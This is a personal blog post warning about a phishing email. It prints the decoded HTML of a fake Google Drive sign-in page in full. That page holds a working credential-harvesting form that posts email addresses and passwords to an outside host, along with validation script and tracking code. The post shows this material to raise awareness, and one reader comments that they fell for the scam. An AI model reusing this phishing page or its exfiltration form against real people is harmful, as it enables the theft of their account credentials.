X

New phishing scam

A new tactic is afoot.  This one is even more cleaver than other ones i've seen.  They go around the phishing philters and compromised websites by delivering the html directly to you via a hashed url.  PLEASE, take caution when opening links from email, even if they appear from someone you know.  Verify with the person before you actually do give up personal information..

I got an email today:

sidean
So this email is coming from someone i know, they are using that person's name in the message.  The red flags in this message is.. the lack of consistency in the fonts, the urgency of clicking on the link, (it's very important) and the fact that no other information is included such as what the document is that he wants me to read.

so you click on the link (http://theshalt.com/dropdown/emgoogle.html) and it takes you to...

googledrivescrapeNow never using google drive before, i wasn't to sure what to expect but pretty sure that google wouldn't have used a hashed url..

hashedurl

 

 
decoding the url actually didn't take me to another url.. instead it took me to actually html code.
<html xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Google Drive - Google Docs</title>
<link rel="stylesheet" type="text/css" href="http://www.supergroupbd.com/admin/image/googleimages/index_files/style.htm">
<link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/apdfllckaahabafndbhieahigkjlhalf"><link rel="icon" href="https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_4.ico">
<style type="text/css">
d

...
<if ((emailID.value==null)||(emailID.value=="")){

alert("Please Enter your Email ID")
emailID.focus()
return false
}
if ((emailPASS.value==null)||(emailPASS.value=="")){
alert("Please Enter your Email Password")
emailPASS.focus()
return false
}
return true
}

 

<form name="other" method="post" action="http://krucoopbkk.com/media/plg_system_highlight/hightlightseee.php" onSubmit="return ValidateFormOther()">

<p><font color="#990000" size="4">Sign in with your email
address and password to view your google document</font></p>
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Email Address:&nbsp;
<input name="login" style="width: 244px;" type="text">&nbsp;
<span class="auto-style7">eg: johnabc@yourdomain.com</span><br>
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

Password:&nbsp; <input name="passwd" style="width: 172px;" type="password">&nbsp;&nbsp;
<strong>
<input class="auto-style1" name="Button1" value="View Document" type="submit"><br>
<br>
<img id="displayTextgmail" src="http://www.supergroupbd.com/admin/image/googleimages/index_files/gmail.jpg" title="Gmail" border="0" height="22" width="72"><img alt="" src="http://www.supergroupbd.com/admin/image/googleimages/index_files/yahoo.jpg" height="27" width="108"><img id="displayTexthotmail" src="http://www.supergroupbd.com/admin/image/googleimages/index_files/hotmail.jpg" title="Hotmail" border="0" height="32" width="113"></strong><img id="displayTextaol" src="http://www.supergroupbd.com/admin/image/googleimages/index_files/aol.jpg" title="Aol" border="0" height="23" width="80">
<img id="displayTextother" src="http://www.supergroupbd.com/admin/image/googleimages/index_files/other.jpg" title="Other Email" border="0" height="19" width="98"><img src="http://www.supergroupbd.com/admin/image/googleimages/index_files/universalnav-logo.gif" height="23" width="124"></form>
<br><br><br><br><br></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>

<!-- WiredMinds eMetrics tracking with Enterprise Edition V5.4 START -->
<script type="text/javascript" src="http://www.supergroupbd.com/admin/image/googleimages/index_files/count.js"></script><div style="display: none;" id="YontooLocationStore2">http://dvwllt.com/gbm/docs/Google%20Docs.htm</div><div style="left: 0px; top: 0px; text-align: left; vertical-align: top; width: 1px; height: 1px; position: absolute;" class="yontoolayerwidget" id="BottomBarBrain2"></div><div style="left: 909px; top: 0px; text-align: left; vertical-align: top; width: 155px; height: 1px; line-height: 0px; z-index: 2147483647; position: fixed;" class="yontoolayerwidget" id="dropdowndeals"><div id="dddContainer" style="position: relative; width: 155px; height: 100%;"> <object id="dddContent" data="http://www.supergroupbd.com/admin/image/googleimages/index_files/DddWrapper.swf" style="outline-color: -moz-use-text-color; outline-style: none; outline-width: medium; visibility: visible;" type="application/x-shockwave-flash" height="100%" width="100%"><param value="false" name="menu"><param value="always" name="allowScriptAccess"><param value="transparent" name="wmode"><param value="domain=dvwllt.com&amp;protocol=http:&amp;clientId=36022397-d49e-48fd-9185-447e08ed57d3" name="flashvars"></object> </div></div><div style="left: 0px; top: 0px; text-align: left; vertical-align: top; width: 0px; height: 0px; position: absolute;" class="yontoolayerwidget" id="EasyInlineApp"></div>
<script type="text/javascript"><!--
wm_custnum='3fb3d7e58d269dc9';
wm_page_name='Google Docs.htm';
wm_group_name='/services/webpages/d/v/dvwllt.com/public/gbm/docs';
wm_campaign_key='campaign_id';
wm_track_alt='';
wiredminds.count();
// -->
</script>
<!-- WiredMinds eMetrics tracking with Enterprise Edition V5.4 END -->
<div style="display: none;" id="YontooInstallID">36022397-d49e-48fd-9185-447e08ed57d3</div><div style="display: none;" id="Y2PluginIds">Y2:36022397-d49e-48fd-9185-447e08ed57d3</div><!-- www.serversfree.com Analytics Code -->

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-24425628-3']);
_gaq.push(['_setDomainName', window.location.host]);
_gaq.push(['_setAllowLinker', true]);
_gaq.push(['_trackPageview']);

 

<!-- End Of Analytics Code --></body></html>

 
The true culprit in the whole scheme is this line right here.. <form name=”other” method=”post” action=”http://krucoopbkk.com/media/plg_system_highlight/hightlightseee.php” onSubmit=”return ValidateFormOther()”>  It's taking the data you sent them and submitting it to these people.

They even use google analytics to track their success.

 

ONE COMMENT ON THIS POST To “New phishing scam”

  1. JT February 28, 2014 at 9:29 am

    Hi. I fell for this one – first time ever 🙁 Do you know if they hijack all your google account details, or just your emails. They’ve been spamming everyone I’ve ever emailed.

Contact me

Using the contact form to send me email at below

Keep in touch with us

You can use the following information to contact us if you wanna join us or anything need to communicate.

Name: john
Skype: john-munoz